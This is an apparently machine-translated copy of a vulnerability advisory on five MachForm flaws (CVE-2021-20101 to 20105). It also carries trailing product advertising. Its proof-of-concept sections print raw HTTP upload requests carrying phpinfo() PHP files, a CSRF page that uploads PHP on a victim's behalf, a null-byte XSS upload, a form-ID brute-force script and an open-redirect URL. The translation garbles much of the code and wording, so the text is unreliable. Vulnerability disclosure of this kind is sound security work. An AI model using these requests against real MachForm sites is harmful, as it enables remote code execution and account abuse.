脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

Machform多个漏洞

剧情简介

(1)HTTP主机头注射- cve - 2021 - 20101

CVSSv3基础分数:4.3

CVSSv3向量:AV: N /交流:L /公关:N / UI: R / S: U / C: L /我:N: N

CWE: 20

MachForm是容易HTTP主机头注入验证主机头的不当造成的。

这个漏洞可以利用通过web缓存中毒。这将涉及到攻击者中毒的缓存缓存代理运行的应用程序,比如CDN的例子。这将导致受害者被迫接受恶意的内容——包括了主机头。

如下所示的请求/响应的一个示例是受害者将是服务。我们可以看到,用户定向远离他们的目的网站一个潜在的恶意“https://evil.site/”。

这个漏洞被发现在很多地方在这个应用程序中,用户被重定向到一个位置基于用户的主机头。

= = = = = = = = = = = = = = = = = = = = = = = = = = =

概念验证

重现这个问题,下面的请求发送到目标。

获得/ machform / export_entries。php HTTP / 1.1

主持人:tenable.com

用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 87.0)壁虎/ 20100101 / 87.0

接受:text / html, application / xhtml + xml应用程序/ xml; q = 0.9,图像/ webp * / *; q = 0.8

接收语言:en - us, en; q = 0.5

接受编码:gzip压缩

连接:关闭

Upgrade-Insecure-Requests: 1



然后,您将看到你重定向到tenable.com域

= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

(2)跨站点请求伪造(CSRF) - cve - 2021 - 20102

CVSSv3基础分数:6.3

CVSSv3向量:(AV: N /交流:L /公关:N / UI: R / S: U / C: L /我:L /答:L)

CWE:352年

没有为MachForms CSRF保护。我们可以看到下面的POST请求,没有使用CSRF令牌。通过制作恶意链接或页面和骗取受害者的用户访问这些链接/页,攻击者可能会迫使受害者用户执行敏感的应用程序操作。

POST / machform /上传。php HTTP / 1.1

主持人:<目标地址>

用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 87.0)壁虎/ 20100101 / 87.0

接受:* / *

接收语言:en - us, en; q = 0.5

接受编码:gzip压缩

内容类型:多部分/格式;边界= - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767

内容长度:622

连接:关闭


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767

附加:格式;name = " Filedata”;文件名= " test.pht "


内容类型:图像/ jpeg


< ? php

phpinfo ();

? >


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767

附加:格式;name = " form_id "


11791年

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767

附加:格式;name = " element_id "


39

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767

附加:格式;name = " file_token "


c7274582933239cb9789c0bf1615cf8e

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 - - -





攻击者可以利用这个问题通过创建一个虚拟页面,在经过身份验证的用户的会话中执行javascript如果他们被骗使用恶意虚拟页面。

= = = = = = = = = = = = = = = = = = = = = = = = = =

概念验证

下面的HTML和javascript可以用来仿真示例站点。如果一个用户浏览虚拟网站,提交表单,恶意请求将代表用户上传.pht文件。

下面是一个例子假网站出于演示目的。请注意,为了测试这个你需要改变IP地址在HTML页面MachForms运行的服务器。

< html >

<身体>

<脚本>历史。pushState(“,”,“/”) > < /脚本

<脚本>

submitRequest()函数

{

var xhr = new XMLHttpRequest ();

xhr。open(“文章”、“https: \ \ / <目标地址> \ / machform \ /上传。php”,真正的);

xhr。setRequestHeader(“接受”,“* \ / *”);

xhr。setRequestHeader(“接收语言”,“en - us, en; q = 0.5”);

xhr。setRequestHeader(“内容类型”、“多部分\ /格式;边界= - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767”);

xhr。withCredentials = true;

身体var = " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 \ r \ n”+

“附加项:格式;name = \“Filedata \”;文件名= \”测试。pht \“\ r \ n”+

“\ r \ n”+

“内容类型:图像/ jpeg \ r \ n”+

“\ r \ n”+

“\ x3c ?php \ r \ n”+

“phpinfo (); \ r \ n”+

”?\ x3e \ n”+

“\ r \ n”+

“- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 \ r \ n”+

“附加项:格式;name = \“form_id \ \ r \ n +

“\ r \ n”+

“11791 \ r \ n”+

“- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 \ r \ n”+

“附加项:格式;name = \“element_id \ \ r \ n +

“\ r \ n”+

“39 \ r \ n”+

“- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 \ r \ n”+

“附加项:格式;name = \“file_token \ \ r \ n +

“\ r \ n”+

“c7274582933239cb9789c0bf1615cf8e \ r \ n”+

“- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767——\ r \ n”;

var一体= new Uint8Array (body.length);

(var = 0;我< aBody.length;我+ +)

一体的[我]= body.charCodeAt(我);

xhr。发送(新Blob((一体)));

}

> < /脚本

action = " # " > <形式

< input type = " button " value = " Submit请求" onclick = " submitRequest ();“/>

> < /形式

< /身体>

< / html >



= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

(3)未经身份验证的文件上传/扩展过滤器绕过- cve - 2021 - 20103

CVSSv3基础分数:7.1

CVSSv3向量:AV: N /交流:L /公关:N / UI: R / S: U / C: H /我:L /答:N

CWE:434年

指出在测试过程中,存储的目标是容易跨站脚本由于封锁不足通过upload.php文件附件上传的形式。利用这个攻击者需要附加一个null字节上传文件名绕过扩展验证。

未经过身份验证的攻击者可以利用这个问题注入恶意javascript时将执行浏览附件。这可以用来窃取其他用户cookie,迫使用户行为没有他们的知识。

= = = = = = = = = = = = = = = = = = = = = = = = = =

概念验证

重现这个问题,发送请求到以下MachForm目标。注意:您将需要改变目标IP地址的主机头的你自己的目标。

POST / machform /上传。php HTTP / 1.1

主持人:<你的目标地址>

用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 87.0)壁虎/ 20100101 / 87.0

接受:* / *

接收语言:en - us, en; q = 0.5

接受编码:gzip压缩

内容类型:多部分/格式;边界= - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767

内容长度:597

连接:关闭


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767

附加:格式;name = " Filedata”;文件名= " test.html % 00”


<脚本>警报(文件上传XSS) > < /脚本


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767

附加:格式;name = " form_id "


123年

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767

附加:格式;name = " element_id "


39

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767

附加:格式;name = " file_token "


faketoken

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 - - -






你可以看到,当浏览,浏览器呈现我们上传HTML和JavaScript。

= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

(4)未经身份验证的文件上传远端控制设备- cve - 2021 - 20104

CVSSv3基础分数:8.1

CVSSv3向量:AV: N /交流:H /公关:UI: N / N / S: U / C: H /我:H: H

CWE:434年

MachForm容易未经身份验证的远程代码执行是由于没有检查通过upload.php某些文件扩展名的文件附件上传。

我们正在测试的系统在使用PHP 7.0和输入版本2.4.25和支持以下文件扩展名默认输入:. PHP、简单,.php4, .php5, .php7, .pht, .phtml。PHP。下面的代码片段我们可以看到pht, php7, php文件扩展名失踪的扩展黑名单。

这意味着我们可以上传任意PHP代码pht或php7扩展和远程服务器执行代码。在以下情况下,phpinfo()函数被称为在上传文件。

.pht上传示例



.php7上传示例

注意,不同的PHP版本支持不同的扩展。例如,PHP 7.4支持.phar . PHP、。PHP和.phtml。在这种情况下MachForm仍然是脆弱的,因为它不检查.phar或。php文件扩展名。

未经过身份验证的攻击者可以利用这个问题将恶意的PHP代码注入一种依恋pht或php7扩展,然后远程服务器执行代码无论用户拥有MachForm过程。

注意:为了使攻击者利用这个漏洞,一个活跃的形式必须已经存在MachForm实例,并攻击者会发现表单ID蛮干。Python脚本的一个例子可以用来实现这可能类似于以下:

进口的要求


Target_address = ' x.x.x.x '


因为我在范围(20000):

打印(“测试ID: {}”.format(我))

id_probe =请求。get (" https:// " + target_address + ' / machform / embed.php ? id = {}“.format(我))

如果id_probe。文本! =“这是无效的URL形式。”:

id =我

打破


打印(' ID: {} ' .format (ID))

攻击者也需要发现上传文件的文件名进而增加复杂性利用这个漏洞。

= = = = = = = = = = = = = = = = = = = = = = = = =

概念验证

的一个例子如何pht文件上传和删除.tmp中可以看到以下的请求序列。

最初的文件上传:

POST / machform /上传。php HTTP / 1.1

主持人:<主机>

用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 87.0)壁虎/ 20100101 / 87.0

接受:* / *

接收语言:en - us, en; q = 0.5

接受编码:gzip压缩

内容类型:多部分/格式;边界= - - - - - - - - - - - - - - - - - - - - - - - - - - - - -21333666862359421718924202306

内容长度:637

连接:关闭

饼干:_ga = GA1.2.832054924.1614855353;PHPSESSID = jcgvfgsu37j8sk7lsedutieb41;mf_has_cookie = 1


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -21333666862359421718924202306

附加:格式;name = " Filedata”;文件名= " test.pht "

内容类型:应用程序/八进制


< ? php

phpinfo ();

? >


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -21333666862359421718924202306

附加:格式;name = " form_id "


11791年

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -21333666862359421718924202306

附加:格式;name = " element_id "


39

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -21333666862359421718924202306

附加:格式;name = " file_token "


f9bf32a6f41cac20da8596a42ef51e59

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -21333666862359421718924202306 - - -



嵌入文件1(饼干):

POST / machform /嵌入。php HTTP / 1.1

主持人:<主机>

用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 87.0)壁虎/ 20100101 / 87.0

接受:text / html, application / xhtml + xml应用程序/ xml; q = 0.9,图像/ webp * / *; q = 0.8

接收语言:en - us, en; q = 0.5

接受编码:gzip压缩

内容类型:多部分/格式;边界= - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

内容长度:5568

连接:关闭

饼干:_ga = GA1.2.832054924.1614855353;PHPSESSID = jcgvfgsu37j8sk7lsedutieb41;mf_has_cookie = 1

Upgrade-Insecure-Requests: 1


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_1_1 "


7

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_1_2 "


5

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_1_3 "


2021年

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_1_datepick "


05/07/2021

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_31_1 "


测试

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_31_2 "


测试

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_33 "


123456789

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_32_1 "


测试

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_32_2 "


测试

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_15 "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_16 "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_17 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_18 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_19 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_20 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_21 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_22 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_40 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_3_1 "


5

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_3_2 "


5

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_3_3 "


2021年

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_3_datepick "


05/05/2021

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_35 "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_5 "


111年

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_34 "


测试

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_26 "


测试

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_12 "


没有一个

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_7_3 "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_7_other "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_6_6 "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_8 "


0

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_24 "


2

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_25 "


2

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_36 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_37 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_9 "


2

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_10 "


2

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_11 "


2

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_13 "


2

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_38 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_23 "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_39”;文件名= " "

内容类型:应用程序/八进制



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " element_39_token "


f9bf32a6f41cac20da8596a42ef51e59

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " form_id "


11791年

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " submit_form "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694

附加:格式;name = " page_number "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 - - -




嵌入文件2:

POST / machform /嵌入。php HTTP / 1.1

主持人:<主机>

用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 87.0)壁虎/ 20100101 / 87.0

接受:text / html, application / xhtml + xml应用程序/ xml; q = 0.9,图像/ webp * / *; q = 0.8

接收语言:en - us, en; q = 0.5

接受编码:gzip压缩

内容类型:多部分/格式;边界= - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

内容长度:5562

连接:关闭

饼干:_ga = GA1.2.832054924.1614855353;PHPSESSID = jcgvfgsu37j8sk7lsedutieb41;mf_has_cookie = 1

Upgrade-Insecure-Requests: 1


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_1_1 "


7

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_1_2 "


5

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_1_3 "


2021年

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_1_datepick "


05/07/2021

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_31_1 "


测试

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_31_2 "


测试

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_33 "


123456789

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_32_1 "


测试

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_32_2 "


测试

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_15 "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_16 "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_17 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_18 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_19 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_20 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_21 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_22 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_40 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_3_1 "


5

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_3_2 "


5

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_3_3 "


2021年

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_3_datepick "


05/05/2021

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_35 "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_5 "


111年

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_34 "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_26 "


2

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_12 "


没有一个

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_7_3 "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_7_other "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_6_6 "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_8 "


0

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_24 "


2

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_25 "


2

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_36 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_37 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_9 "


2

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_10 "


2

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_11 "


2

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_13 "


2

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_38 "



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_23 "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_39”;文件名= " "

内容类型:应用程序/八进制



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " element_39_token "


f9bf32a6f41cac20da8596a42ef51e59

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " form_id "


11791年

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " submit_form "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242

附加:格式;name = " page_number "


1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 - - -






确认1:

GET / machform / confirm_embed.php吗?mfsid HTTP / 1.1 = id = 11791

主持人:<主机>

用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 87.0)壁虎/ 20100101 / 87.0

接受:text / html, application / xhtml + xml应用程序/ xml; q = 0.9,图像/ webp * / *; q = 0.8

接收语言:en - us, en; q = 0.5

接受编码:gzip压缩

连接:关闭

饼干:_ga = GA1.2.832054924.1614855353;PHPSESSID = jcgvfgsu37j8sk7lsedutieb41;mf_has_cookie = 1

Upgrade-Insecure-Requests: 1




确认2:

POST / machform / confirm_embed。php HTTP / 1.1

主持人:<主机>

用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 87.0)壁虎/ 20100101 / 87.0

接受:text / html, application / xhtml + xml应用程序/ xml; q = 0.9,图像/ webp * / *; q = 0.8

接收语言:en - us, en; q = 0.5

接受编码:gzip压缩

内容类型:应用程序/ x-www-form-urlencoded

内容长度:39

连接:关闭

饼干:_ga = GA1.2.832054924.1614855353;PHPSESSID = jcgvfgsu37j8sk7lsedutieb41;mf_has_cookie = 1

Upgrade-Insecure-Requests: 1


id = 11791 &mf_page_from = 0 &review_submit = 1



注意:您将需要改变目标IP地址的主机头的你自己的目标。

= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

(5)开放重定向- cve - 2021 - 20105

CVSSv3基础分数:4.7

CVSSv3向量:AV: N /交流:L /公关:N / UI: R / S: C / C: N /我:L /答:N

CWE:601年

Safari_init。php是容易开放的重定向的脆弱性。攻击者可以工艺的价值$ _GET [' ref ']随后在一个URL参数控制的价值“位置”HTTP响应头。这可以被滥用在钓鱼攻击重定向浏览器/用户恶意攻击者的选择的web页面。

引用=削减美元($ _GET [' ref ']);

介绍人美元= htmlspecialchars函数(base64_decode(推荐人美元),ENT_QUOTES);

setcookie (" mf_safari_cookie_fix ", " 1 ", 0);/ / cookie过期的会话(浏览器被关闭)

头(地点:{$介绍人});

= = = = = = = = = = = = = = = = = = = = = = = =

概念验证

例如,下面的URL重定向用户http://google.com。“裁判”的价值是base64编码。

/ machform / safari_init.php ? ref = aHR0cDovL2dvb2dsZS5jb20 =

和响应:

HTTP / 2 302

日期:2021年5月10日,星期一,18:33:52格林尼治时间

Apache服务器:

到期:星期四,1981年11月19日08:52:00格林尼治时间

cache - control: no - cache, must-revalidate没有商店

编译指示:no - cache

set - cookie: mf_safari_cookie_fix = 1

地点:http://google.com

内容长度:0

内容类型:text / html;utf - 8字符集=

解决方案

升级到16或更高版本

披露时间表

05/12/2021——站得住脚的要求MachForm安全通过联系我们联系形式。
05/13/2021——MachForm提供了一个安全联系。
05/13/2021——站得住脚的发送脆弱性报告。90天的日期是2021年8月11日。
05/13/2021——AppNitro谢谢我们。他们将回到美国。
05/15/2021——大多数vulns AppNitro可以确认。提出了一个问题关于文件上传。
05/19/2021——站得住脚的解释了发现和得分。
05/19/2021——AppNitro感谢我们澄清。他们计划下个月底之前版本修复。问我们如何喜欢被称赞。
05/20/2021——站得住脚的提供信贷额度。
06/21/2021——AppNitro提供状态更新和发布的6月28日。站得住脚的承认。
06/28/2021——AppNitro发送补丁发布信息。

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
25 - 2021
信贷

Derrie萨顿

CVSSv3基地/时间的分数
8.1/7.3
CVSSv3向量
AV: N /交流:H /公关:UI: N / N / S: U / C: H /我:H: H
受影响的产品
Machform v16之前
风险因素

咨询时间

06/28/2021——最初版本。

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

